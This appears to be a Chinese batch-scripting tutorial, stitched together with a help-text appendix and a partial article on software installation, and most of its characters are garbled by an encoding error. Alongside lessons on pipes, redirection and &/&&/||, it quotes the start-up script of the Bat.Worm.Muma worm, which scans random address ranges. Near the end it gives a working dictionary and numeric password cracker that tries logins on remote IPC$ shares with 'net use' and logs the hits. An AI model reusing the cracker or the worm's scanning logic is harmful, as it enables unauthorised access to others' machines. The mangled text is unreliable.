��Z��么把�q�三个命令放��C��h��Ԍ��原因除了我说明外�Q�恐怕谁也想不到�Q�很��单的一句话�Q�其实我也不太懂�Q�是的，对于�q�两个命令，我是从研�I?Bat.Worm.Muma病毒开始学习的�Q�时间过��M��不少�Q�但�q�是没完全搞明白�Q�我怕讲出来�q�自己都看不懂，我更怕不��心讲错了成了罪人。所以我�l�出一个脚本去告诉你，如何让这两个命��o�l�自��q��一个初步的印象�Q�其实也��是�q�两个命令的入门�Q�而�ƈ不是说如何领会这两个命��o。因��领会如此�_�֦�的两个命令（特别是for�Q�谈何容易！也许你会表扬我说我诚实、不懂就不懂�Q�也�怽�会骂我，让我既然不懂��p��紧滚蛋，不要在这里丢人显��|��也许你还会说一些别的这样那样好听或不好听的话，都随便你了，即��我不同意你说的话�Q�我也会誓死捍卫你说话的权利。看例十一�Q?

@echo off
for /? > for.txt
set /? > set.txt
shift /? >shift.txt
exit

执行后在当前路径下就生成for.txt、set.txt和shift.txt三个文�g�Q�里面分别记录了for命��o、set命��o和shift命��o的帮助信息。地球�h都能看懂�Q�我��׃��多说了。我在网上曾�l�找了很长时间这三个命��o的教�E�，但都不理惻I��基本都是照搬的帮助信息。我惛_��自己完全掌握了这两个命��o后，一定要写一��用自己的文字�ȝ��出来的for、set和shift教程�Q�关于shift命��o�Q�后面介�l�批处理的参数时�q�将涉及刎ͼ��Q�一定会的，�q�是我的心愿之一�Q�需要注意的一�Ҏ��Q�这三个命��o的帮助里�Q�介�l�的都比较死板，虽然也�D了一些例子，但这是远�q�不够的。要掌握�q�两个命令，最需要的��是耐心�Q�没写错�Q�就是耐心。光是认真看完它们的帮助文字��已�l�需要��够的耐心了，要进一步练习领会这两个命��o�Q�难道不需要更大的耐心�Q�实战练习的��Z��我会留给你的�Q�关键还是那句话�Q�看你有没有耐心�ȝ��I�了。看看例十二�Q?

START.BAT�Q?
CALL MUMA.BAT
SET IPA=192.168
CALL 10.BAT 0
:NEARAGAIN
netstat -n|find ":" >A.TMP
FOR /F "tokens=7,8,9,10,12 delims=.: " %%I IN (A.TMP) DO SET NUM1=%%I&& SET NUM2=%%J&& SET NUM3=%%K&& SET NUM4=%%L&& SET NUM5=%%M&& CALL NEAR.BAT
:START
CALL RANDOM.BAT
IF "%NUM1%"=="255" GOTO NEARAGAIN
IF "%NUM1%"=="192" GOTO NEARAGAIN
IF "%NUM1%"=="127" GOTO NEARAGAIN
IF "%NUM2%"=="255" GOTO NEARAGAIN
IF "%NUM3%"=="255" GOTO NEARAGAIN
IF "%NUM4%"=="255" GOTO NEARAGAIN
SET IPA=%NUM1%.%NUM2%
ECHO START > A.LOG
PING %IPA%.%NUM3%.1>B.TMP
PING %IPA%.%NUM3%.%NUM4%>>B.TMP
FIND /C /I "from" B.TMP
IF ERRORLEVEL 1 GOTO START
CALL 10.BAT %NUM3%
DEL A.LOG
GOTO START
�q�是Bat.Worm.Muma病毒的�v始脚本，讄��了病毒运行的环境变量。是不是看的头都大了�Q�又忘了写在�W�一章第一�D늚�那句话（静下心来�Q�）�Q�你应该能体会到学习�q�两个命令所需要的耐心了吧。就如同�ȝ��一个�h�Q�你得学会宽容，打不得骂不得�Q�用你宽大的胸怀��d��容她的一切，即��你发现爱她的�q�程如看上面代码的过�E�一栯��你头大，但你�q�是得爱下去----爱需要理由吗�Q�不需要吗�Q�需要吗�Q�不需要吗……�{�到风��^��静后，最直观的收获就是，你的耐心变的前所未有的充��I��面对她的复杂和善变，你自�׃��处变不惊�Q�以自己的方式去从容应付曄��应付不了的场面，即��到最后一�w�伤痕，也会感慨曄��的�D动有多么伟大�?

没错�Q�这��是批处理的��力�Q�这��是��q��力。让你受了伤�q�感谢伤你的人。这�U�感觉就好象在自己最喜欢的音乐声中被人强奸，痛�ƈ快乐着�?

不得不再�ơ重申一遍，各种DOS命��o是批处理的BODY�Q�我实在找不��Z��个更合适的词来形容他们之间的关�p�）�Q�学好DOS命��o是学好批处理的前提。其�?DOS命��o如copy、dir、del、type、path、break、start�{�内部命令，以及ping、net、cmd、at、sort�?attrib、fc、find�{�外部命令，在批处理里的应用非常�q�泛。这��教�E�的作用�Q�是教你认识批处理，以及如何利用DOS命��o�l�合出来一个完��的批处理脚本，去让它自动完成你惌��它做的事情。而灵�z�自如的�~�辑一个批处理脚本是徏立在熟练掌握DOS命��o的基��上的�Q�这已经��出了本文的范畴�Q�在此就不赘�q�C��?

不知不觉中第三章已经�l�束了。耳麦里传来的依然是陈晓东的《比我幸��》，每隔4�?2�U�就自动重播。虽然我不�ƈ不很喜欢陈晓东，可这�q�不妨碍我喜�Ƣ音乐，喜欢�q�首描写的如此让人感慨的歌。请你一定要比我�q�福/才不枉费我狼狈退�?再痛也不说苦/�׃��用抱歉来弥补/臛_��我能成全你的�q��?误��得你要比我幸��?/才值得我对自己�D�酷/我默默的倒数/最后再把你看清�?看你眼里的我好馍�p?慢慢被放逐。我如同一个因�q�老失色而拉不到客的老妓奻I��l�望的徘徊在曄��辉煌的红灯区�Q�用一脸的木然瞟一眼来来去�ȝ��人群�Q�默默的回忆自己�q�不光彩的过去，�q�L��自己��要面对的未来。直到看见那些幸��依偎在一��L��情��G们，才突焉��发现上帝的公�q�I��和这�U�公�q�的�D�忍�?br /> 可以��_��批处理脚本中最重要的几个命令我都没有给出如echo或if那样比较详细的介�l�，原因我已�l�说了，因�ؓ我也是个菜，我也不太�?---但我正在学！你呢�Q�今天又��M��一��图书馆�Q�淘金一样发��C��一本叫《DOS�Ҏ��件》的东东�Q�藏在一个角落里落满了灰�Q�五本摞一起就跟砖头一样厚了。大概翻了一下，里面介绍了很多比较底层和基础的东西，虽然从思�\上讲�Q�已�l�有点time out了，很多东西已经基本没有利用的�h��|��q�就是信息时代的更新速度�Q�，但还是很值得看的。于是打��下午淘�q�来�Q�放假回��M��再好好研�I�一番，�q�同那几个不熟悉的命令一��h��熟了�Q�再�l�写�q�篇教程。我始终坚信�Q�没有最好只有更好�?br />
但是很可惜，�{�到下午再去的时候，图书馆楼梯口已经立了一个牌子，上面写着out of service----人家�q�学期的工作�l�束了。于是回到宿舍打��l�写�W�四章，正在�q�时又得��C��?#8220;振奋人心”的消息：期末考试有一�U�挂了，而且是全班第一----�q�一门整个班里就挂了我一个。郁��L��情��A刚w��间涌上心��_��整个世界仿佛都变成黑的了。食堂和��卖部已�l�陆�l�关门，学校里的��来越��，�q�面�q�来的几个同学也都一�w�行李，忙碌着准备回家�q�年�Q�内心的孤寂和失落如同夏日里暴雨前的乌云�Q�迅速而不可抗拒的占领了心里每一个角落。迎着一月的冷风我一个�h在天桥上发呆�Q�还能怎么��P��q�期末考试都应付不了的��p�|男�h�?br />
“��N��休息”旉��好象长了点，呵呵�Q�上课了�Q�从�q�一章开始，��详�l�介�l�批处理中常用的几个�l�合命��o和管道命令。这些命令虽然不是必��ȝ��Q�如同爱一个�h时不一定非得每天去陪，但如果少了这个过�E�，事情��׃��变的复杂而不完美�Q�所以我认�ؓ��道命��o和组合命令是批处理的调味剂，几乎是少不了的�?br />
下面从管道命令讲赗��常用的��道命��o有以下这些：|�?gt;�?gt;>

11、|

�q�个命��o恐怕大家不是很陌生�Q�经常操作DOS的朋友都应该知道�Q�当我们查看一个命令的帮助�Ӟ��如果帮助信息比较长，一屏幕昄��不完时DOS�q�不�l�我们时间让我们看完一屏幕再翻到另一屏幕�Q�而是直接昄��到帮助信息的最后。如在提�C�符下输入help回�R�Ӟ��׃��看到当前DOS版本所支持的所有非隐含命��o�Q�但你只能看到最后的那些命��o�Q�前面的早就一闪而过了，如何解决�q�个问题�Q�看例十三：

help | more

回�R后会发现昄��满一屏幕后就自动暂停�Q�等候��l�显�C�其他信息。当按写回�R�Ӟ��变成一个一个的出现�Q�按下空格键时一屏幕一屏幕昄��Q�直到全部显�C�完为止�Q�按其他键自动停止返回DOS�?br />
��Z��么会出现上述现象�Q�答案很��单，�q�里�l�合了管道命令|和DOS命��omore来共同达到目的的。这里先��单介�l�一下help命��o和more命��o�Q�对理解|命��o的用法有很大帮助�?br />
11.1、help命��o。其实这个命令是不需要多说的�Q�但在上�q�C��子中help命��o的用法比较特�D�，直接在DOS提示�W�下输入help命��o�Q�结果是�?DOS昄��其所支持的所有非隐含命��o�Q�而在其他地方用help命��o�Q�如输入net help回�R�Q�则是显�C�net命��o的帮助信息�?br />
11.2、more命��o。可能很多朋友以前就没有接触�q�这个命令，�q�个命��o在Linux下的用处非常�q�泛�Q�也是管道命令之一。大家可以找一��比较长的文章（a.txt�Q�在DOS提示�W�下输入如下两个命��o��L��较一下差别：more a.txt和type a.txt。利用more命��o�Q�可以达到逐屏或逐行昄��输出的效果，而type命��o只能一�ơ把输出昄��完，最后的�l�果��是只能看到末尾的部分。在例十三里�Q�more命��o的作用就是让输出的信息逐屏或逐行昄��?br /> 看到�q�里�Q�你是否已经能隐�U�感受到了|命��o的作用了�Q�没错，它的作用�Q�就是把前一命��o的输出当后一命��o的输入来用的。在例十三里�Q�前一命��o的输出，��是 help命��o执行后显�C�的DOS所支持的所有非隐含命��o�Q�而这个结果刚好做了后一命��omore的输入。所以例十三和下面的例十四是�{�效的：

help > a.txt
more a.txt
del a.txt

�q�里利用另一��道命��o>生成了一个a.txt文�g作�ؓ中间环节�Q�在用more命��o查看a.txt文�g后再删除a.txt文�g�Q�例十三的所有操作是在内存中�q�行的，不生成文�Ӟ��。可以看出，正确使用��道命��o|可以带来事半功倍的效果�?br />
�l�合例十三和例十四，以及前面的例九再体会一遍：|命��o的作用，��是让前一命��o的输出当做后一命��o的输入�?br />
12�?gt;�?gt;>

�q�两个命令的效果从本质上来说都是一��L��Q�他们都是输出重定向命��o�Q�说的通俗一点，��是把前面命令的输出写入��C��个文件中。这两个命��o的唯一区别是，>会清除掉原有文�g中的内容后把新的内容写入原文�Ӟ��?gt;>只会另�v一行追加新的内容到原文件中�Q�而不会改动其中的原有内容。例十五�Q?br />
echo @echo off > a.bat
echo echo This is a pipeline command example. >> a.bat
echo echo It is very easy? >> a.bat
echo echo Believe your self! >> a.bat
echo pause >> a.bat
echo exit >> a.bat

依次在DOS提示�W�下输入以上各行命��o�Q�一行一个回车，��在当前目录下生成一个a.bat文�g�Q�里面的内容如下�Q?br />
@echo off
echo This is a pipeline command example.
echo It is very easy?
echo Believe your self!
pause
exit

看到�q�里�Q�你得到了多��信息？1、可以直接在DOS提示�W�下利用echo命��o的写入功能编辑一个文本，而不需要专门的文本�~�辑工具�Q?、管道命�?gt; �?gt;>的区别如上所�q�。如果这里只�?gt;命��o来完成上面操作，最后也会生成一个a.bat�Q�但里面的内容就只剩下最后一行exit了。所�?gt;�?gt;>一般都联合��h��用，除非你重定向的输出只有一行，那么��可以只�?gt;了。结合例一再仔�l�体会输出重定向��道命��o> �?gt;>的用法�?br />
13�?lt;�?gt;&�?lt;&

�q�三个命令也是管道命令，但它们一般不常用�Q�你只需要知道一下就ok了，当然如果想仔�l�研�I�的话，可以自己查一下资料�?br />
<�Q�输入重定向命��o�Q�从文�g中读入命令输入，而不是从键盘中读入�?
>&�Q�将一个句柄的输出写入到另一个句柄的输入中�?
<&�Q�刚好和>&相反�Q�从一个句柄读取输入�ƈ��其写入到另一个句柄输��Z��?br />
关于�q�三个管道命令的举例�Q�在后面批处理脚本的�_�֦�应用中还��涉及到�?br />

下面介绍�l�合命��o�Q?amp;�?amp;&、||

�l�合命��o�Q�顾名思义�Q�就是可以把多个命��o�l�合��h��当一个命令来执行。这在批处理脚本里是允许的，而且用的非常�q�泛。它的格式很��?---既然现在已经成了一个文件了�Q�那么这多个命��o��p��用这些组合命令连接�v来放在同一�?---因�ؓ批处理认行不认命令数目。组合命令的作用�Q�就如同�l�爱人陪不是�Q�说一句是��_��说十句也是说�Q�不一�ơ把好话都说了出来，效果可能会好�?---当然得排除一�U�特�D�情况：�q�些话是否有先后��序�Q�有些话是否可以同时说。在批处理脚本里也一��P��有些时候某些命令是不能同时执行的，后面�l�你说�?br />
刚刚又送走了一个同学，人去楼空的感觉越来越明显�Q�望着�I��荡的床铺�Q��^日里喧闹的宿舍就只剩下我一个�h了，整个世界只有那个�q�x��令�h非常讨厌的老鼠�q�时候才昑־�可爱��h��----只有它会陪着我在�q�不敢开灯的漆黑夜里----一个连期末考试都应付不了的��p�|男�h。失败！我感到快要呼�怸��q�来�Q�这�U�失败的压力��直��o我窒息，��直让我的手接收不到大脑的信号�Q�简直让�q�篇未完成的教程夭折。但我能怪谁�Q?br />
忙碌了一学期要过�q�了却挂了科�Q�失败；挂了�U�也倒�Ş了，竟然一个�h拖全班的后退�Q�失败中的失败；更失败的�Q�是在这最��p��的时候，竟然找不��C��个�h可以倾诉�Q�然而最��p�|的，是突然发现自��q��然如此脆弱，如此耐不住寂寞。不�q�这倒也解开了心中疑惑很久的一个问题：��Z��么明知道那段情是一个旋涡却�q�心甘情愿的往里面�?---�q�就是青春，风一��L��q�龄�Q�火一样不安的心。不再爱了，我不要再一个�h的时候苦苦等待；不再�׃��Q�我不要在你�l�的囚笼里怜悯的爱�Q�不再爱了，我不要在别�h的视�U�K��如此可笑�Q�不再爱�Q�我不再爱。就��塌下来�Q�我也要一个�h扛着�Q�头不能低腰不能弯，不能喘息不能倾诉�Q�因��然失败，但还是男人，是男人就不能向困难低��_��

14�?amp;

�q�可以说是最��单的一个组合命令了�Q�它的作用是用来�q�接n个DOS命��o�Q��ƈ把这些命令按��序执行�Q�而不��是否有命��o执行��p�|。例十六�Q?br />
copy a.txt b.txt /y & del a.txt

其实�q�句和move a.txt b.txt的效果是一��L��Q�只不过前者是分了两步来进行的�Q�在后面�q�将涉及到具体��用哪�U�方法的问题�Q�。这个命令很��单，��׃��多费口舌了，唯一需要注意的一�Ҏ��Q�这�?amp;两边的命令是有执行顺序的�Q�从前往后执行�?br />

15�?amp;&

切记�Q�这里介�l�的几个命��o都是�l�合命��o�Q�所以他们前后都必须都有其他命��o�Q�要不如何组合？�Q�。这个命令也不例外，它可以把它前后两个命令组合�v来当一个命令来用，�?amp;命��o不同之处在于�Q�它在从前往后依�ơ执行被它连接的几个命��o时会自动判断是否有某个命令执行出错，一旦发现出错后��不�l�箋执行后面剩下的命令。这��׃ؓ我们自动化完成一些�Q务提供了方便。例十七�Q?br />
dir 文�g://1%/www/user.mdb && copy 文�g://1%/www/user.mdb e:\backup\www

如果�q�程��L��存在user.mdb�Q�则copy到本地e:\backup\www�Q�如果不存在当然��׃��执行copy了。这句对搞网��的朋友是否有点用呢�Q�呵��c��其实它和下面这句的作用是一��L��Q?br />
if exist 文�g://1%/www/user.mdb copy 文�g://1%/www/user.mdb e:\backup\www

至于你喜�Ƣ用哪个��随便了�Q�我没办法判断dir和if两个命��o哪一个执行效率更高，所以不知道用哪个更好，呵呵�?br />
你是否还记得“有些命��o是不能同时执行的”�Q�你是否�怿��q�句话？当然得相信，不信��q��你出道题�Q�把C盘和D盘的文�g和文件夹列出到a.txt文�g中。你��如何来搞定�q�道题？有朋友说�Q�这�q�不是很easy的问题吗�Q�同时执行两个dir�Q�然后把得到的结�?gt;到a.txt里就ok了嘛�Q�看例十八：

dir c:\ && dir d:\ > a.txt

仔细研究一下这句执行后的结果，看看是否能达到题目的要求�Q�错了！�q�样执行后a.txt里只有D盘的信息�Q��ؓ什么？��因��?amp;&命��o�?gt;命��o不能同时出现一个句子里�Q�批处理把一行看成一个句子）�Q�！�l�合命��o&&的优先��没有��道命��o>的优先��高（自己�ȝ��的，不妥的地方请指正�Q�！所以这句在执行时将本分成这两部分：dir c:\和dir d:\ > a.txt�Q�而�ƈ不是如你想的�q�两部分�Q�dir c:\ && dir d:\�?gt; a.txt。要使用�l�合命��o&&辑ֈ�题目的要求，必须得这么写�Q?br />
dir c:\ > a.txt && dir d:\ >> a.txt

�q�样�Q�依据优先��高低�Q�DOS��把�q�句话分成以下两部分�Q�dir c:\ > a.txt和dir d:\ >> a.txt。例十八中的几句的差别比较特�D�，值得好好研究体会一下�?br />
当然�q�里�q�可以利�?amp;命��o�Q�自己想一下道理哦�Q�：

dir c:\ > a.txt & dir d:\ >> a.txt

16、||

�q�个命��o的用法和&&几乎一��P��但作用刚好和它相反：利用�q�种�Ҏ��在执行多条命令时�Q�当遇到一个执行正��的命��o��退出此命��o�l�合�Q�不再��l�执行下面的命��o。题目：查看当前目录下是否有以s开头的exe文�g�Q�如果有则退出。例十九�Q?br />
@echo off
dir s*.exe || exit

其实�q�个例子是有破熾的，你看出来了吗�Q�其实很��单，自己试试��q��道了嘛：如果存在那个exe文�g�Q�就退出；如果不存在那个exe文�g�Q�也退出！��Z��么？因�ؓ如果不存在那�?exe文�g�Q�则前一条命令dir s*.exe执行肯定是不成功的，所以就�l�箋执行exit�Q�自然就退��Z��Q�呵��c��那么如何解决题目给出的问题呢？看例二十�Q?br />
@echo off
dir s*.exe || echo Didn't exist file s*.exe & pause & exit

�q�样执行的结果，��p��辑ֈ�题目的要求，是否存在s*.exe��出��C��U�结果。这里加暂停的意思，当然是让你能看到echo输出的内容，否则一闪而过的窗口，echo��q��写了�?br />
�l�出两个更好研究优先�U�（同时也是更难理解�Q�的脚本�Q�仔�l�研�I�它们的区别�Q�以便彻底理解各�U�命令的优先�U�顺序，对以后自己利用这些命令写脚本有很大的好处----不会出错�Q�OK�Q�请看例二十一和例二十二：
例二十一�Q?br />
@echo off
dir a.ttt /a & dir a.txt || exit

例二十二�Q?br />
@echo off
dir a.ttt /a && dir a.txt || exit

警告�Q�患有心脑血��病的朋友请不要研究以上两例�Q�否则轻者头大如斗，重者血��爆裂。�Q何�h�׃��研究�q�两个脚本的区别而造成的�Q何事故由自己或其合法监护��责，与本人和本论坛无兟뀂特此警告！

有关��道命��o和组合命令就大概介绍到这里了�Q�不知道聪明的你是否理解�Q�呵呵，能理解就成天才了�Q�除非你以前��已�l�掌握！千万别小看了�q�几个鬼命��o�Q�大��槌是我的说�Q�简直就不是人学的东西！但我�q�是静下心来研究了一番，最后得出的�l�论如上所�q�ͼ�已经一点不剩的交给你了�Q�希望你好好收藏�q�消化吸�Ӟ��当然有错误被你发��C��Q�或者不完整的地方被你看出来了，误��紧告诉我一壎ͼ�

�q�几个命令真的把我的头都搞大了。在�|�上有一��流传很�q�的批处理教�E�：“��明批处理教程”�Q�虽然说的比较全面，但看��h��很不�q�瘾。在对for�{�命令介�l�时��׃��个for /? > a.txt & start a.txt完事了（当然�q�一点上我不能说人家什么，毕竟我连for /?都没�l�出�Q�，而对上述��道命��o和组合命令、以及这��教�E�以后将讲到的用批处理操作注册表�{�方面根本没有介�l�。我之所以花整整一章来讲管道命令和�l�合命��o�Q�是因�ؓ他们才是批处理的�_�֍�和灵��，能否正确利用好这几个命��o�Q�是能否掌握批处理的前提条�g。如for、set�{�DOS命��o的问题，可以从DOS的角度出发专门有针对性的学习�Q�但有关�q�几个命令的问题�Q�却是不�Ҏ��_�N��掌握的----他们之间的关�p�d��复杂了！
��下列代码存为bat文�g
1、如果用字典破解�Q�pass.bat 字典文�g路径及名�U?��L�� 用户�?
2、如果用数字破解�Q�pass.bat 起始�?步长 �l�束�?��L�� 用户�?br /> 密码破解出来之后�Q�存放于c:\pass.txt文�g里面�?
��下列代码存为pass.bat文�g
@echo off
echo ------------------------------------------------------------------- >>c:\pass.txt
echo ------------------------------------------------------------------- >>c:\pass.txt
date /t >>c:\pass.txt
time /t >>c:\pass.txt
echo 破解�l�果�Q?>>c:\pass.txt
if "%6"=="1" goto 大棒槌是我的�?
:大棒槌是我的�?
start "正在破解" /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3
goto quit
:大棒槌是我的�?
start "正在破解" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5
:quit
��下列代码存为test.bat
net use \\%1\ipc$ %2 /user:"%3"
goto answer%ERRORLEVEL%
rem %ERRORLEVEL%表示取前一命��o执行�q�回�l�果�Q�net use成功�q�回0�Q�失败返�?
:answer0
echo �q�程��L��Q?%1" >>c:\pass.txt
echo �?��P��"%3" >>c:\pass.txt
echo �?码：%2 >>c:\pass.txt
net use \\%1\ipc$ /delet
exit
:answer2

For
对一�l�文件中的每个文件运行指定的命��o�?

可以在批处理�E�序中或直接从命令提�C�符使用 for 命��o�?br />
要在批处理程序中使用 for 命��o�Q�请使用以下语法�Q?

for %%variable in (set) docommand [command-parameters]

要在命��o提示�W�下使用 for�Q�请使用以下语法�Q?

for %variable in (set) do command [command-parameters]

参数

%%variable �?%variable

代表可替换的参数。for 命��o使用�?set 中指定的每个文本字符串替�?%%variable�Q�或 %variable�Q�，直到此命令（�?command-parameters 中指定）处理所有的文�g为止。��?%% variable 在批处理�E�序中执�?for 命��o。��?% variable 通过命��o提示�W�执�?for 命��o。变量名区分大小写�?br />
(set)

指定要用指定的命令处理的一个或多个文�g或文本字�W�串。需要括受��?

command

指定要在指定�?set 所包含的每个文件上执行的命令�?

command-parameters

指定要用于指定命令（如果指定的命令要使用��M��参数或开养I��的�Q何参数或开兟�?br />
如果启用了命令扩展（Windows 2000 中的默认讄��)�Q�将支持 for 命��o的其他�Ş式�?br /> For 命��o的其他�Ş�?br /> 如果启用了命令扩展，��支持如�?for 命��o的其他格式：

只限于目�?br />
for /D [%% | %]variable in (set) docommand [command-parameters]

如果 set 包含通配�W�（* �??�Q�，则指定与目录名匹配，而不是文件名�?br />
递归

for /R [[drive :]path] [%% | %]variable in (set) docommand [command-parameters]

�q�入根目录树[drive:]path�Q�在树的每个目录中执�?for 语句。如果在 /R 后没有指定目录，则假定�ؓ当前目录。如�?set 只是一个句�?(.) 字符�Q�则只列丄��录树�?br />
�q�代

for /L [%% | %]variable in (start�Q�step�Q�end) do command [command-parameters]

集合是一�p�d��按步镉K��划分的、从头到��数字。这��P��(1,1,5) ��生成序�?1 2 3 4 5�Q��?(5,-1,1) ��生成序�?(5 4 3 2 1)�?br />

BAT文�g技�?br />

文章�l�构
1. 所有内�|�命令的帮助信息
2. 环境变量的概�?
3. 内置的特�D�符�?实际使用中间注意避开)
4. ��单批处理文�g概念
5. 附�g1 tmp.txt
6. 附�g2 sample.bat

######################################################################
1. 所有内�|�命令的帮助信息
######################################################################
ver
cmd /?

set /?
rem /?
if /?
echo /?
goto /?
for /?
shift /?
call /?
其他需要的常用命��o
type /?
find /?
findstr /?
copy /?
______________________________________________________________________
下面��所有上面的帮助输出��C��个文�?
echo ver >tmp.txt
ver >>tmp.txt
echo cmd /? >>tmp.txt
cmd /? >>tmp.txt
echo rem /? >>tmp.txt
rem /? >>tmp.txt
echo if /? >>tmp.txt
if /? >>tmp.txt
echo goto /? >>tmp.txt
goto /? >>tmp.txt
echo for /? >>tmp.txt
for /? >>tmp.txt
echo shift /? >>tmp.txt
shift /? >>tmp.txt
echo call /? >>tmp.txt
call /? >>tmp.txt
echo type /? >>tmp.txt
type /? >>tmp.txt
echo find /? >>tmp.txt
find /? >>tmp.txt
echo findstr /? >>tmp.txt
findstr /? >>tmp.txt
echo copy /? >>tmp.txt
copy /? >>tmp.txt
type tmp.txt
______________________________________________________

######################################################################
2. 环境变量的概�?
######################################################################
_____________________________________________________________________________
C:Program Files>set
ALLUSERSPROFILE=C:Documents and SettingsAll Users
CommonProgramFiles=C:Program FilesCommon Files
COMPUTERNAME=FIRST
ComSpec=C:WINNTsystem32cmd.exe
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Os2LibPath=C:WINNTsystem32os2dll;
Path=C:WINNTsystem32;C:WINNT;C:WINNTsystem32WBEM
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 6 Stepping 5, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0605
ProgramFiles=C:Program Files
PROMPT=$P$G
SystemDrive=C:
SystemRoot=C:WINNT
TEMP=C:WINNTTEMP
TMP=C:WINNTTEMP
USERPROFILE=C:Documents and SettingsDefault User
windir=C:WINNT
_____________________________________________________________________________

path: 表示可执行程序的搜烦路径. 我的��是你把你的程序copy �?
%windir%system32. �q�个目录里面. 一般就可以自动搜烦�?
语法: copy mychenxu.exe %windir%system32.
使用�?.) 便于一目了�?
对环境变量的引用使用(英文模式,半角)双引�?
%windir% 变量
%%windir%% 二次变量引用.
我们常用的还�?
%temp% 临时文�g目录
%windir% �pȝ��目录
%errorlevel% 退��Z��?

输出文�g��C��时文件目录里�?�q�样便于当前目录整洁.

�Ҏ��I�格的参�? 你应该学会��用双引号("") 来表�C�比如对porgram file文�g�Ҏ��?
C:>dir p*
C: 的目�?
2000-09-02 11:47 2,164 PDOS.DEF
1999-01-03 00:47

Program Files
1 个文�?2,164 字节
1 个目�?1,505,997,824 可用字节

C:>cd pro*
C:Program Files>

C:>
C:>cd "Program Files"
C:Program Files>

######################################################################
3. 内置的特�D�符�?实际使用中间注意避开)
######################################################################
微��Y里面内置了下列字�W�不能够在创建的文�g名中间��?
con nul aux / | || && ^ > < *

You can use most characters as variable values, including white space. If you use the special characters <, >, |, &, or ^, you must precede them with the escape character (^) or quotation marks. If you use quotation marks, they are included as part of the value because everything following the equal sign is taken as the value. Consider the following examples:
(大意: 要么你��用^作�ؓ前导字符表示.或者就只有使用双引�?"�?
To create the variable value new&name, type:
set varname=new^&name

To create the variable value "new&name", type:
set varname="new&name"

The ampersand (&), pipe (|), and parentheses ( ) are special characters that must be preceded by the escape character (^) or quotation marks when you pass them as arguments.

find "Pacific Rim" < trade.txt > nwtrade.txt
IF EXIST filename. (del filename.) ELSE echo filename. missing

> 创徏一个文�?
>> �q�加��C��个文件后�?
@ 前缀字符.表示执行时本行在cmd里面不显�C? 可以使用 echo off关闭昄��
^ 对特�D�符�? > < &)的前导字�W? �W�一个只是显�C�aaa �W�二个输出文件bbb
echo 123456 ^> aaa
echo 1231231 > bbb
() 包含命��o
(echo aa & echo bb)
, 和空��g��L��~�省分隔�W�号.
; 注释,表示后面为注�?
: 标号作用
| ��道操作
& Usage�Q�第一条命�?& �W�二条命�?[& �W�三条命�?..]
用这�U�方法可以同时执行多条命令，而不��命令是否执行成�?
dir c:*.exe & dir d:*.exe & dir e:*.exe
&& Usage�Q�第一条命�?&& �W�二条命�?[&& �W�三条命�?..]
当碰到执行出错的命��o后将不执行后面的命��o�Q�如果一直没有出错则一直执行完所有命令；
|| Usage�Q�第一条命�?|| �W�二条命�?[|| �W�三条命�?..]
当碰到执行正��的命��o后将不执行后面的命��o�Q�如果没有出现正��的命��o则一直执行完所有命令；

常用语法格式
IF [NOT] ERRORLEVEL number command para1 para2
IF [NOT] string1==string2 command para1 para2
IF [NOT] EXIST filename command para1 para2

IF EXIST filename command para1 para2
IF NOT EXIST filename command para1 para2
IF "%1"=="" goto END
IF "%1"=="net" goto NET
IF NOT "%2"=="net" goto OTHER
IF ERRORLEVEL 1 command para1 para2
IF NOT ERRORLEVEL 1 command para1 para2
FOR /L %%i IN (start,step,end) DO command [command-parameters] %%i
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do echo %i %j %k
按照字母��序 ijklmnopq依次取参�?
eol=c - 指一个行注释字符的结��?��׃��?
skip=n - 指在文�g开始时忽略的行数�?
delims=xxx - 指分隔符集。这个替换了�I�格和蟩格键的默认分隔符集�?

九宝 2009-06-01 15:50 发表评论

九宝 — Mon, 05 May 2008 07:04:00 GMT
软�g在安装时�Q�到底做了些什么？大家每天都在用电脑，可能也经常在自己的电脑上安装软�g。就��自己没安装�q�，臛_��也看��C�h家安装过软�g。在�q�里�Q�我不是��x��你怎么安装软�g�Q�而是惛_��你展�C�，软�g在安装的�q�程中，到底都做了些什么动作？��Z��么有些��Y件要安装�Q�直接拷贝过��d��不能用？��Z��么一些��Y件安装或卸蝲之后要重启。下面要讨论的就是这些问题�?
    首先�Q�我们探讨一下��Y件安装的共通部分，说共通，��是在不同版本的操作�pȝ��上，如WINDOWS98�Q�WIN2K和WINXP�{�上它们都有共同点的地方。这个文章也试图不针对具体的某个操作�pȝ��Q�而对共同的规律来探讨�Q�不�q�我自己用的是WINDOWS98�Q�所以有时一些例子可能会用WINDOWS98上的实例来说明，而大多数情况下这些特***在WIN2K和WINXP上也是类似的�?/p>
    那么�Q�我先来归纳一下，典型的��Y件安装过�E�都有可能做哪些事情。由于我们是讨论软�g在安装时的行为，所以开始安装前的设�|�和选项我们��暂不讨论，只说到��Y件真正开始安装那个时候�v的动作：

①文件从安装源位�|�拷贝到目标位置�?/p>
②往�pȝ��目录写入一些必要的动态连接库(DLL)�?可�?

③往�pȝ��注册表中写入相应的设�|�项�?可�?

④徏立开始菜单里的程序组和桌面快��h��式�?可�?

⑤其他动作�?可�?

     下面我们再详�l�来分析上面归纳出来的这些动作：

1)拯��软�g本��n需要的文�g。源位置指��Y件未安装之前的位�|�，例如光盘�Q�下载的目录�{�，目标位置指你指定的安装位�|��?/p>
�q�是几乎所有的软�g安装�q�程一定会做的一件事。而如果一个��Y�Ӟ��在安装时只要�q�一步，不需要后面的其他几步�Q�我们可以认��个��Y件就是绿色��Y件。或者反�q�来说绿色��Y件就是只要拷贝文�Ӟ��不需要依赖于某个DLL�Q�或者它依赖的DLL在几乎所有的�pȝ��中都一定有的，�q�且它也不依赖于注册表里面的讄��的软�g�?/p>
